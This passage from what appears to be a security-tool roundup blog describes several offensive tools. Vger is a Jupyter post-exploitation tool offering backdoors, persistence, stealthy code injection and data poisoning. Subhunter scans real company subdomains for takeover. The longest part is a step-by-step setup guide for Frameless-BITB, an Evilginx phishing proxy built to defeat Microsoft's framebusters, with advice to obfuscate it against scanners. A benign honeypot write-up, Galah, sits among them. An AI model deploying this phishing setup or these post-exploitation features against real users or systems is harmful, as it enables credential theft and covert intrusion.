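    print(sorted(expand_ports("80,443,8080-8090"))[:5])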

    Examples:

    • ./domainim nmap.org --ports=all
    • ./domainim google.com --ports=none --dns=8.8.8.8#53
    • ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --rps=1500
    • ./domainim pptx704.com --ports=t100 --wordlist=wordlist.txt --out=results.json
    • ./domainim mysite.com --ports=t50,5432,7000-9000 --dns=1.1.1.1

    The help menu can be accessed using ./domainim --help or ./domainim -h.

    Usage:
    domainim <domain> [--ports=<ports> | -p:<ports>] [--wordlist=<filename> | -l:<filename> [--rps=<int> | -r:<int>]] [--dns=<dns> | -d:<dns>] [--out=<filename> | -o:<filename>]
    domainim (-h | --help)

    Options:
    -h, --help Show this screen.
    -p, --ports Ports to scan. [default: `none`]
    Can be `all`, `none`, `t<n>`, single value, range value, combination
    -l, --wordlist Wordlist for subdomain bruteforcing. Bruteforcing is skipped for invalid file.
    -d, --dns IP and Port for DNS Resolver. Should be a valid IPv4 with an optional port [default: system default]
    -r, --rps DNS queries to be made per second [default: 1024 req/s]
    -o, --out JSON file where the output will be saved. Filename must end with `.json`

    Examples:
    domainim domainim.com -p:t500 -l:wordlist.txt --dns:1.1.1.1#53 --out=results.json
    domainim sub.domainim.com --ports=all --dns:8.8.8.8 -r:1500 -o:results.json

    The JSON schema for the results is as follows-

    [
        {
            "subdomain": string,
            "data": [
                {
                    "ipv4": string,
                    "vhosts": [string],
                    "reverse_dns": string,
                    "ports": [int]
                }
            ]
        }
    ]

    Example json for nmap.org can be found here.
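
    A small post-processing sketch for a result file produced with --out, following the schema above (the nesting of "data" entries is assumed from that schema):

    # Sketch: summarize a Domainim JSON result file.
    import json

    with open("results.json") as f:
        results = json.load(f)

    for entry in results:
        for record in entry["data"]:
            print(f'{entry["subdomain"]} -> {record["ipv4"]} '
                  f'({len(record.get("vhosts", []))} vhosts, {len(record.get("ports", []))} open ports)')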

    Contributing

    Contributions are welcome. Feel free to open a pull request or an issue.

    Planned Features

    • [x] TCP port scanning
    • [ ] UDP port scanning support
    • [ ] Resolve AAAA records (IPv6)
    • [x] Custom DNS server
    • [x] Add bruteforcing subdomains using a wordlist
    • [ ] Force bruteforcing (even if wildcard subdomain is found)
    • [ ] Add more engines for subdomain enumeration
    • [x] File output (JSON)
    • [ ] Multiple domain enumeration
    • [ ] Dir and File busting

    Others

    • [x] Update verbose output when encountering errors (v0.2.0)
    • [x] Show progress bar for longer operations
    • [ ] Add individual port scan progress bar
    • [ ] Add tests
    • [ ] Add comments and docstrings

    Additional Notes

    This project is still in its early stages. There are several limitations I am aware of.

    The two engines I am using (I'm calling them engines because Sublist3r does so) currently have some sort of response limit. dnsdumpster can fetch up to 100 subdomains. crt.sh also randomizes the results in case of too many results. Another issue with crt.sh is the fact that it sometimes returns an SQL error. So for some domains, results can differ between runs. I am planning to add more engines in the future (at least a brute force engine).

    The port scanner only uses a timeout of ping response time + 750ms. This might lead to false negatives. Since domainim is not meant for port scanning but to provide a quick overview, such cases are acceptable. However, I am planning to add a flag to increase the timeout. For the same reason, filtered ports are not shown. For more comprehensive port scanning, I recommend using Nmap. Domainim also doesn't bypass rate limiting (if there is any).

    It might seem that the way vhostnames are printed just introduces repetition.


    Printing them as follows might have been better-

    ack.nmap.org, issues.nmap.org, nmap.org, research.nmap.org, scannme.nmap.org, svn.nmap.org, www.nmap.org
    ↳ 45.33.49.119
    ↳ Reverse DNS: ack.nmap.org.

    But previously while testing, I found cases where not all IPs are shared by the same set of vhostnames. That is why I decided to keep it this way.


    DNS servers might have some sort of rate limiting. That's why I added random delays (between 0-300ms) for IPv4 resolving per query. This avoids hitting the DNS server with all the queries at once and spreads them out more naturally. For the bruteforcing method, the value is between 0-1000ms by default, but that can be changed using the --rps | -r flag.

    One particular limitation that is bugging me is that the DNS resolver would not return all the IPs for a domain. So it is necessary to make multiple queries to get all (or most) of the IPs. But then again, it is not possible to know how many IPs are there for a domain. I still have to come up with a solution for this. Also, nim-ndns doesn't support CNAME records. So, if a domain has a CNAME record, it will not be resolved. I am waiting for a response from the author for this.

    For now, bruteforcing is skipped if a possible wildcard subdomain is found. This is because, if a domain has a wildcard subdomain, bruteforcing will resolve IPv4 for all possible subdomains. However, this will skip valid subdomains also (i.e. scanme.nmap.org will be skipped even though it's not a wildcard value). I will add a --force-brute | -fb flag later to force bruteforcing.
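
    The wildcard check mentioned above can be pictured as resolving a random, almost-certainly-nonexistent label and seeing whether it still gets an answer. This is only an illustration of the idea, not Domainim's actual logic:

    # If a random nonsense label resolves, wildcard DNS is likely and bruteforce results are unreliable.
    import socket
    import uuid

    def has_wildcard(domain):
        probe = f"{uuid.uuid4().hex}.{domain}"
        try:
            socket.gethostbyname(probe)
            return True
        except socket.gaierror:
            return False

    print(has_wildcard("example.com"))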

    A similar thing is true for vhost enumeration with subdomain inputs. Since URLs that end with the given subdomain are returned, subdomains of sibling domains are not considered. For example, scannme.nmap.org will not be printed for ack.nmap.org, but something.ack.nmap.org might be. I could search for all subdomains of nmap.org, but that defeats the purpose of having a subdomain as an input.

    License

    MIT License. See LICENSE for full text.



    Vger - An Interactive CLI Application For Interacting With Authenticated Jupyter Instances

    By: Zion3R

    V'ger is an interactive command-line application for post-exploitation of authenticated Jupyter instances with a focus on AI/ML security operations.

    User Stories

    • As a Red Teamer, you've found Jupyter credentials, but don't know what you can do with them. V'ger is organized in a format that should be intuitive for most offensive security professionals to help them understand the functionality of the target Jupyter server.
    • As a Red Teamer, you know that some browser-based actions will be visible to the legitimate Jupyter users. For example, modifying tabs will appear in their workspace and commands entered in cells will be recorded to the history. V'ger decreases the likelihood of detection.
    • As an AI Red Teamer, you understand academic algorithmic attacks, but need a more practical execution vector. For instance, you may need to modify a large, foundational internet-scale dataset as part of a model poisoning operation. Modifying that dataset at its source may be impossible or generate undesirable auditable artifacts. With V'ger you can achieve the same objectives in-memory, a significant improvement in tradecraft.
    • As a Blue Teamer, you want to understand logging and visibility into a live Jupyter deployment. V'ger can help you generate repeatable artifacts for testing instrumentation and performing incident response exercises.

    Usage

    Initial Setup

    1. pip install vger
    2. vger --help

    Currently, vger interactive has maximum functionality, maintaining state for discovered artifacts and recurring jobs. However, most functionality is also available by-name in non-interactive format with vger <module>. List available modules with vger --help.

    Commands

    Once a connection is established, users drop into a nested set of menus.

    The top level menu is:

    • Reset: Configure a different host.
    • Enumerate: Utilities to learn more about the host.
    • Exploit: Utilities to perform direct action and manipulation of the host and artifacts.
    • Persist: Utilities to establish persistence mechanisms.
    • Export: Save output to a text file.
    • Quit: No one likes quitters.

    These menus contain the following functionality:

    • List modules: Identify imported modules in target notebooks to determine what libraries are available for injected code.
    • Inject: Execute code in the context of the selected notebook. Code can be provided in a text editor or by specifying a local .py file. Either input is processed as a string and executed in the runtime of the notebook.
    • Backdoor: Launch a new JupyterLab instance open to 0.0.0.0, with allow-root, on a user-specified port with a user-specified password.
    • Check History: See ipython commands recently run in the target notebook.
    • Run shell command: Spawn a terminal, run the command, return the output, and delete the terminal.
    • List dir or get file: List directories relative to the Jupyter directory. If you don't know, start with /.
    • Upload file: Upload a file from localhost to the target. Specify paths in the same format as List dir (relative to the Jupyter directory). Provide a full path including filename and extension.
    • Delete file: Delete a file. Specify paths in the same format as List dir (relative to the Jupyter directory).
    • Find models: Find models based on common file formats.
    • Download models: Download discovered models.
    • Snoop: Monitor notebook execution and results until timeout.
    • Recurring jobs: Launch/Kill recurring snippets of code silently run in the target environment.
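
    For a sense of what this kind of enumeration looks like against an authenticated Jupyter server, the sketch below lists notebook sessions via the standard Jupyter REST API. This is a generic illustration of the idea, not V'ger's implementation:

    # List notebook sessions on an authenticated Jupyter server via its REST API.
    import requests

    def list_sessions(base_url, token):
        resp = requests.get(
            f"{base_url.rstrip('/')}/api/sessions",
            headers={"Authorization": f"token {token}"},
            timeout=10,
        )
        resp.raise_for_status()
        return [s.get("path") for s in resp.json()]

    if __name__ == "__main__":
        for path in list_sessions("http://127.0.0.1:8888", "REDACTED_TOKEN"):
            print("notebook session:", path)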

    Experimental

    With pip install vger[ai] you'll get LLM-generated summaries of notebooks in the target environment. These are meant to be rough translations for non-DS/AI folks to quickly triage whether (or which) notebooks are worth investigating further.

    There was an inherent tradeoff on model size vs. ability and that's something I'll continue to tinker with, but hopefully this is helpful for some more traditional security users. I'd love to see folks start prompt injecting their notebooks ("these are not the droids you're looking for").

    Examples



    Subhunter - A Fast Subdomain Takeover Tool

    By: Zion3R


    Subdomain takeover is a common vulnerability that allows an attacker to gain control over a subdomain of a target domain and redirect users intended for an organization's domain to a website that performs malicious activities, such as phishing campaigns, stealing user cookies, etc. It occurs when an attacker gains control over a subdomain of a target domain. Typically, this happens when the subdomain has a CNAME in the DNS, but no host is providing content for it. Subhunter takes a given list of subdomains and scans them to check for this vulnerability.
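
    The underlying check can be sketched as: resolve the CNAME, fetch the page, and look for a known provider fingerprint. The fingerprint below is a placeholder for illustration, not an entry from Subhunter's dataset (Subhunter itself is written in Go):

    # Conceptual subdomain-takeover check: dangling CNAME + provider fingerprint in the response body.
    import dns.resolver   # pip install dnspython
    import requests

    FINGERPRINTS = {"github.io": "There isn't a GitHub Pages site here."}  # placeholder entry

    def check(subdomain):
        try:
            cname = str(dns.resolver.resolve(subdomain, "CNAME")[0].target).rstrip(".")
        except Exception:
            return None
        for service, marker in FINGERPRINTS.items():
            if cname.endswith(service):
                body = requests.get(f"http://{subdomain}", timeout=10).text
                if marker in body:
                    return f"possible takeover via {service} ({cname})"
        return None

    print(check("sub.example.com"))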


    Features:

    • Auto update
    • Uses random user agents
    • Built in Go
    • Uses a fork of fingerprint data from well known sources (can-i-take-over-xyz)

    Installation:

    Option 1:

    Download from releases

    Option 2:

    Build from source:

    $ git clone https://github.com/Nemesis0U/Subhunter.git
    $ go build subhunter.go

    Usage:

    Options:

    Usage of subhunter:
    -l string
    File including a list of hosts to scan
    -o string
    File to save results
    -t int
    Number of threads for scanning (default 50)
    -timeout int
    Timeout in seconds (default 20)

    Demo (Added fake fingerprint for POC):

    ./Subhunter -l subdomains.txt -o test.txt

    ____ _ _ _
    / ___| _ _ | |__ | |__ _ _ _ __ | |_ ___ _ __
    \___ \ | | | | | '_ \ | '_ \ | | | | | '_ \ | __| / _ \ | '__|
    ___) | | |_| | | |_) | | | | | | |_| | | | | | | |_ | __/ | |
    |____/ \__,_| |_.__/ |_| |_| \__,_| |_| |_| \__| \___| |_|


    A fast subdomain takeover tool

    Created by Nemesis

    Loaded 88 fingerprints for current scan

    -----------------------------------------------------------------------------

    [+] Nothing found at www.ubereats.com: Not Vulnerable
    [+] Nothing found at testauth.ubereats.com: Not Vulnerable
    [+] Nothing found at apple-maps-app-clip.ubereats.com: Not Vulnerable
    [+] Nothing found at about.ubereats.com: Not Vulnerable
    [+] Nothing found at beta.ubereats.com: Not Vulnerable
    [+] Nothing found at ewp.ubereats.com: Not Vulnerable
    [+] Nothing found at edgetest.ubereats.com: Not Vulnerable
    [+] Nothing found at guest.ubereats.com: Not Vulnerable
    [+] Google Cloud: Possible takeover found at testauth.ubereats.com: Vulnerable
    [+] Nothing found at info.ubereats.com: Not Vulnerable
    [+] Nothing found at learn.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants.ubereats.com: Not Vulnerable
    [+] Nothing found at guest-beta.ubereats.com: Not Vulnerable
    [+] Nothing found at merchant-help.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants-beta.ubereats.com: Not Vulnerable
    [+] Nothing found at merchants-staging.ubereats.com: Not Vulnerable
    [+] Nothing found at messages.ubereats.com: Not Vulnerable
    [+] Nothing found at order.ubereats.com: Not Vulnerable
    [+] Nothing found at restaurants.ubereats.com: Not Vulnerable
    [+] Nothing found at payments.ubereats.com: Not Vulnerable
    [+] Nothing found at static.ubereats.com: Not Vulnerable

    Subhunter exiting...
    Results written to test.txt




    Galah - An LLM-powered Web Honeypot Using The OpenAI API

    By: Zion3R


    TL;DR: Galah (/Ι‘Ι™Λˆlɑː/ - pronounced 'guh-laa') is an LLM (Large Language Model) powered web honeypot, currently compatible with the OpenAI API, that is able to mimic various applications and dynamically respond to arbitrary HTTP requests.


    Description

    Named after the clever Australian parrot known for its mimicry, Galah mirrors this trait in its functionality. Unlike traditional web honeypots that rely on a manual and limiting method of emulating numerous web applications or vulnerabilities, Galah adopts a novel approach. This LLM-powered honeypot mimics various web applications by dynamically crafting relevant (and occasionally foolish) responses, including HTTP headers and body content, to arbitrary HTTP requests. Fun fact: in Aussie English, Galah also means fool!

    I've deployed a cache for the LLM-generated responses (the cache duration can be customized in the config file) to avoid generating multiple responses for the same request and to reduce the cost of the OpenAI API. The cache stores responses per port, meaning if you probe a specific port of the honeypot, the generated response won't be returned for the same request on a different port.
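
    The per-port caching described above can be pictured as keying the cache on (port, request). Galah itself is written in Go; the sketch below is only a conceptual illustration:

    # Same request on a different port -> different cache key, so a fresh response is generated.
    import hashlib

    cache = {}

    def cache_key(port, method, path, body=""):
        digest = hashlib.sha256(f"{method} {path}\n{body}".encode()).hexdigest()
        return (port, digest)

    def get_or_generate(port, method, path, generate):
        key = cache_key(port, method, path)
        if key not in cache:
            cache[key] = generate()   # e.g. call the LLM once, then reuse the result
        return cache[key]

    print(get_or_generate(8080, "GET", "/.git/config", lambda: "403 Forbidden"))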

    The prompt is the most crucial part of this honeypot! You can update the prompt in the config file, but be sure not to change the part that instructs the LLM to generate the response in the specified JSON format.

    Note: Galah was a fun weekend project I created to evaluate the capabilities of LLMs in generating HTTP messages, and it is not intended for production use. The honeypot may be fingerprinted based on its response time, non-standard, or sometimes weird responses, and other network-based techniques. Use this tool at your own risk, and be sure to set usage limits for your OpenAI API.

    Future Enhancements

    • Rule-Based Response: The new version of Galah will employ a dynamic, rule-based approach, adding more control over response generation. This will further reduce OpenAI API costs and increase the accuracy of the generated responses.

    • Response Database: It will enable you to generate and import a response database. This ensures the honeypot only turns to the OpenAI API for unknown or new requests. I'm also working on cleaning up and sharing my own database.

    • Support for Other LLMs.

    Getting Started

    • Ensure you have Go version 1.20+ installed.
    • Create an OpenAI API key from here.
    • If you want to serve over HTTPS, generate TLS certificates.
    • Clone the repo and install the dependencies.
    • Update the config.yaml file.
    • Build and run the Go binary!
    % git clone git@github.com:0x4D31/galah.git
    % cd galah
    % go mod download
    % go build
    % ./galah -i en0 -v

    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    β–ˆβ–ˆ β–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ
    β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ β–ˆβ–ˆ
    llm-based web honeypot // version 1.0
    author: Adel "0x4D31" Karimi

    2024/01/01 04:29:10 Starting HTTP server on port 8080
    2024/01/01 04:29:10 Starting HTTP server on port 8888
    2024/01/01 04:29:10 Starting HTTPS server on port 8443 with TLS profile: profile1_selfsigned
    2024/01/01 04:29:10 Starting HTTPS server on port 443 with TLS profile: profile1_selfsigned

    2024/01/01 04:35:57 Received a request for "/.git/config" from [::1]:65434
    2024/01/01 04:35:57 Request cache miss for "/.git/config": Not found in cache
    2024/01/01 04:35:59 Generated HTTP response: {"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden\nYou don't have permission to access this resource."}
    2024/01/01 04:35:59 Sending the crafted response to [::1]:65434

    ^C2024/01/01 04:39:27 Received shutdown signal. Shutting down servers...
    2024/01/01 04:39:27 All servers shut down gracefully.
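
    The "Generated HTTP response" line in the log above is a JSON object with "Headers" and "Body" fields. As a rough illustration of how such an object maps onto a raw HTTP response (Galah's actual Go code is not shown here):

    # Turn an LLM-generated {"Headers": ..., "Body": ...} object into a raw HTTP response.
    import json

    llm_output = '{"Headers": {"Content-Type": "text/plain", "Server": "Apache/2.4.41 (Ubuntu)", "Status": "403 Forbidden"}, "Body": "Forbidden"}'

    def to_http_response(raw):
        data = json.loads(raw)
        headers = dict(data.get("Headers", {}))
        status = headers.pop("Status", "200 OK")   # "Status" appears inside Headers in the log above
        body = data.get("Body", "")
        lines = [f"HTTP/1.1 {status}"]
        lines += [f"{k}: {v}" for k, v in headers.items()]
        lines += [f"Content-Length: {len(body.encode())}", "", body]
        return "\r\n".join(lines)

    print(to_http_response(llm_output))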

    Example Responses

    Here are some example responses:

    Example 1

    % curl http://localhost:8080/login.php
    <!DOCTYPE html><html><head><title>Login Page</title></head><body><form action='/submit.php' method='post'><label for='uname'><b>Username:</b></label><br><input type='text' placeholder='Enter Username' name='uname' required><br><label for='psw'><b>Password:</b></label><br><input type='password' placeholder='Enter Password' name='psw' required><br><button type='submit'>Login</button></form></body></html>

    JSON log record:

    {"timestamp":"2024-01-01T05:38:08.854878","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"51978","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/login.php","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Content-Type":"text/html","Server":"Apache/2.4.38"},"body":"\u003c!DOCTYPE html\u003e\u003chtml\u003e\u003chead\u003e\u003ctitle\u003eLogin Page\u003c/title\u003e\u003c/head\u003e\u003cbody\u003e\u003cform action='/submit.php' method='post'\u003e\u003clabel for='uname'\u003e\u003cb\u003eUsername:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='text' placeholder='Enter Username' name='uname' required\u003e\u003cbr\u003e\u003clabel for='psw'\u003e\u003cb\u003ePassword:\u003c/b\u003e\u003c/label\u003e\u003cbr\u003e\u003cinput type='password' placeholder='Enter Password' name='psw' required\u003e\u003cbr\u003e\u003cbutton type='submit'\u003eLogin\u003c/button\u003e\u003c/form\u003e\u003c/body\u003e\u003c/html\u003e"}}

    Example 2

    % curl http://localhost:8080/.aws/credentials
    [default]
    aws_access_key_id = AKIAIOSFODNN7EXAMPLE
    aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
    region = us-west-2

    JSON log record:

    {"timestamp":"2024-01-01T05:40:34.167361","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"65311","sensorName":"home-sensor","port":"8080","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/.aws/credentials","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Encoding":"gzip","Content-Length":"126","Content-Type":"text/plain","Server":"Apache/2.4.51 (Unix)"},"body":"[default]\naws_access_key_id = AKIAIOSFODNN7EXAMPLE\naws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY\nregion = us-west-2"}}

    Okay, that was impressive!

    Example 3

    Now, let's do some sort of adversarial testing!

    % curl http://localhost:8888/are-you-a-honeypot
    No, I am a server.

    JSON log record:

    {"timestamp":"2024-01-01T05:50:43.792479","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"61982","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/are-you-a-honeypot","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Length":"20","Content-Type":"text/plain","Server":"Apache/2.4.41 (Ubuntu)"},"body":"No, I am a server."}}

    πŸ˜‘

    % curl http://localhost:8888/i-mean-are-you-a-fake-server
    No, I am not a fake server.

    JSON log record:

    {"timestamp":"2024-01-01T05:51:40.812831","srcIP":"::1","srcHost":"localhost","tags":null,"srcPort":"62205","sensorName":"home-sensor","port":"8888","httpRequest":{"method":"GET","protocolVersion":"HTTP/1.1","request":"/i-mean-are-you-a-fake-server","userAgent":"curl/7.71.1","headers":"User-Agent: [curl/7.71.1], Accept: [*/*]","headersSorted":"Accept,User-Agent","headersSortedSha256":"cf69e186169279bd51769f29d122b07f1f9b7e51bf119c340b66fbd2a1128bc9","body":"","bodySha256":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"},"httpResponse":{"headers":{"Connection":"close","Content-Type":"text/plain","Server":"LocalHost/1.0"},"body":"No, I am not a fake server."}}

    You're a galah, mate!
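
Because each log record is a single JSON object on its own line, reviewing a sensor's traffic can be scripted in a few lines of Python. Here is a minimal sketch, assuming the records shown above are appended to a file named sensor.json (a placeholder name):

import json

# Minimal sketch: summarise honeypot JSON-lines records.
# "sensor.json" is a placeholder; point it at your actual log file.
with open("sensor.json", encoding="utf-8") as fh:
    for line in fh:
        line = line.strip()
        if not line:
            continue
        record = json.loads(line)
        req = record.get("httpRequest", {})
        print(record.get("timestamp"),
              record.get("srcIP"),
              req.get("method"),
              req.get("request"),
              req.get("userAgent"))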



    Frameless-Bitb - A New Approach To Browser In The Browser (BITB) Without The Use Of Iframes, Allowing The Bypass Of Traditional Framebusters Implemented By Login Pages Like Microsoft And The Use With Evilginx

    By: Zion3R


    A new approach to Browser In The Browser (BITB) without the use of iframes, allowing the bypass of traditional framebusters implemented by login pages like Microsoft.

    This POC code is built for using this new BITB with Evilginx, and a Microsoft Enterprise phishlet.


    Before diving deep into this, I recommend that you first check my talk at BSides 2023, where I first introduced this concept along with important details on how to craft the "perfect" phishing attack. β–Ά Watch Video

    β˜•οΈŽ Buy Me A Coffee

    Video Tutorial: πŸ‘‡

    Disclaimer

    This tool is for educational and research purposes only. It demonstrates a non-iframe based Browser In The Browser (BITB) method. The author is not responsible for any misuse. Use this tool only legally and ethically, in controlled environments for cybersecurity defense testing. By using this tool, you agree to do so responsibly and at your own risk.

    Backstory - The Why

    Over the past year, I've been experimenting with different tricks to craft the "perfect" phishing attack. The typical "red flags" people are trained to look for are things like urgency, threats, authority, poor grammar, etc. The next best thing people nowadays check is the link/URL of the website they are interacting with, and they tend to get very conscious the moment they are asked to enter sensitive credentials like emails and passwords.

    That's where Browser In The Browser (BITB) came into play. Originally introduced by @mrd0x, BITB is a concept of creating the appearance of a believable browser window inside of which the attacker controls the content (by serving the malicious website inside an iframe). However, the fake URL bar of the fake browser window is set to the legitimate site the user would expect. This combined with a tool like Evilginx becomes the perfect recipe for a believable phishing attack.

    The problem is that over the past months/years, major websites like Microsoft implemented various little tricks called "framebusters/framekillers" which mainly attempt to break iframes that might be used to serve the proxied website like in the case of Evilginx.

    In short, Evilginx + BITB for websites like Microsoft no longer works. At least not with a BITB that relies on iframes.

    The What

    A Browser In The Browser (BITB) without any iframes! As simple as that.

    Meaning that we can now use BITB with Evilginx on websites like Microsoft.

    Evilginx here is just a strong example, but the same concept can be used for other use-cases as well.

    The How

    Framebusters target iframes specifically, so the idea is to create the BITB effect without the use of iframes, and without disrupting the original structure/content of the proxied page. This can be achieved by injecting scripts and HTML besides the original content using search and replace (aka substitutions), then relying completely on HTML/CSS/JS tricks to make the visual effect. We also use an additional trick called "Shadow DOM" in HTML to place the content of the landing page (background) in such a way that it does not interfere with the proxied content, allowing us to flexibly use any landing page with minor additional JS scripts.
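
As a rough illustration of the substitution idea (a conceptual Python sketch, not the Apache substitution configuration actually shipped with this project), the injected markup is simply appended next to the original content right before the closing body tag, leaving the proxied page otherwise untouched:

# Conceptual sketch only: the real setup performs this rewrite with Apache's
# substitution module on the proxied response. The markup below is illustrative.
INJECTED = ('<div id="bitb-window"><!-- fake browser chrome drawn with CSS/JS --></div>'
            '<script src="/bitb.js"></script>')

def inject(proxied_html: str) -> str:
    # Keep the original structure intact; only append our markup before </body>.
    return proxied_html.replace("</body>", INJECTED + "</body>", 1)

print(inject("<html><body><h1>Sign in</h1></body></html>"))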

    Instructions

    Video Tutorial


    Local VM:

    Create a local Linux VM. (I personally use Ubuntu 22 on VMWare Player or Parallels Desktop)

    Update and Upgrade system packages:

    sudo apt update && sudo apt upgrade -y

    Evilginx Setup:

    Optional:

    Create a new evilginx user, and add user to sudo group:

    sudo su

    adduser evilginx

    usermod -aG sudo evilginx

    Test that evilginx user is in sudo group:

    su - evilginx

    sudo ls -la /root

Navigate to the user's home dir:

    cd /home/evilginx

    (You can do everything as sudo user as well since we're running everything locally)

    Setting Up Evilginx

    Download and build Evilginx: Official Docs

    Copy Evilginx files to /home/evilginx

    Install Go: Official Docs

    wget https://go.dev/dl/go1.21.4.linux-amd64.tar.gz
    sudo tar -C /usr/local -xzf go1.21.4.linux-amd64.tar.gz
    nano ~/.profile

    ADD: export PATH=$PATH:/usr/local/go/bin

    source ~/.profile

    Check:

    go version

    Install make:

    sudo apt install make

    Build Evilginx:

    cd /home/evilginx/evilginx2
    make

    Create a new directory for our evilginx build along with phishlets and redirectors:

    mkdir /home/evilginx/evilginx

    Copy build, phishlets, and redirectors:

    cp /home/evilginx/evilginx2/build/evilginx /home/evilginx/evilginx/evilginx

    cp -r /home/evilginx/evilginx2/redirectors /home/evilginx/evilginx/redirectors

    cp -r /home/evilginx/evilginx2/phishlets /home/evilginx/evilginx/phishlets

    Ubuntu firewall quick fix (thanks to @kgretzky)

    sudo setcap CAP_NET_BIND_SERVICE=+eip /home/evilginx/evilginx/evilginx

    On Ubuntu, if you get Failed to start nameserver on: :53 error, try modifying this file

    sudo nano /etc/systemd/resolved.conf

edit/add the DNSStubListener setting and set it to no: DNSStubListener=no

    then

    sudo systemctl restart systemd-resolved

    Modify Evilginx Configurations:

    Since we will be using Apache2 in front of Evilginx, we need to make Evilginx listen to a different port than 443.

    nano ~/.evilginx/config.json

    CHANGE https_port from 443 to 8443

    Install Apache2 and Enable Mods:

    Install Apache2:

    sudo apt install apache2 -y

    Enable Apache2 mods that will be used: (We are also disabling access_compat module as it sometimes causes issues)

    sudo a2enmod proxy
    sudo a2enmod proxy_http
    sudo a2enmod proxy_balancer
    sudo a2enmod lbmethod_byrequests
    sudo a2enmod env
    sudo a2enmod include
    sudo a2enmod setenvif
    sudo a2enmod ssl
    sudo a2ensite default-ssl
    sudo a2enmod cache
    sudo a2enmod substitute
    sudo a2enmod headers
    sudo a2enmod rewrite
    sudo a2dismod access_compat

    Start and enable Apache:

    sudo systemctl start apache2
    sudo systemctl enable apache2

Check that Apache and the VM's networking work by visiting the VM's IP from a browser on the host machine.

    Clone this Repo:

    Install git if not already available:

    sudo apt -y install git

    Clone this repo:

    git clone https://github.com/waelmas/frameless-bitb
    cd frameless-bitb

    Apache Custom Pages:

    Make directories for the pages we will be serving:

• home: (Optional) Homepage (at base domain)
• primary: Landing page (background)
• secondary: BITB Window (foreground)

sudo mkdir /var/www/home
sudo mkdir /var/www/primary
sudo mkdir /var/www/secondary

    Copy the directories for each page:


    sudo cp -r ./pages/home/ /var/www/

    sudo cp -r ./pages/primary/ /var/www/

    sudo cp -r ./pages/secondary/ /var/www/

    Optional: Remove the default Apache page (not used):

    sudo rm -r /var/www/html/

    Copy the O365 phishlet to phishlets directory:

    sudo cp ./O365.yaml /home/evilginx/evilginx/phishlets/O365.yaml

    Optional: To set the Calendly widget to use your account instead of the default I have inside, go to pages/primary/script.js and change the CALENDLY_PAGE_NAME and CALENDLY_EVENT_TYPE.

    Note on Demo Obfuscation: As I explain in the walkthrough video, I included a minimal obfuscation for text content like URLs and titles of the BITB. You can open the demo obfuscator by opening demo-obfuscator.html in your browser. In a real-world scenario, I would highly recommend that you obfuscate larger chunks of the HTML code injected or use JS tricks to avoid being detected and flagged. The advanced version I am working on will use a combination of advanced tricks to make it nearly impossible for scanners to fingerprint/detect the BITB code, so stay tuned.

    Self-signed SSL certificates:

    Since we are running everything locally, we need to generate self-signed SSL certificates that will be used by Apache. Evilginx will not need the certs as we will be running it in developer mode.

    We will use the domain fake.com which will point to our local VM. If you want to use a different domain, make sure to change the domain in all files (Apache conf files, JS files, etc.)

    Create dir and parents if they do not exist:

    sudo mkdir -p /etc/ssl/localcerts/fake.com/

    Generate the SSL certs using the OpenSSL config file:

    sudo openssl req -x509 -nodes -days 365 -newkey rsa:2048 \
    -keyout /etc/ssl/localcerts/fake.com/privkey.pem -out /etc/ssl/localcerts/fake.com/fullchain.pem \
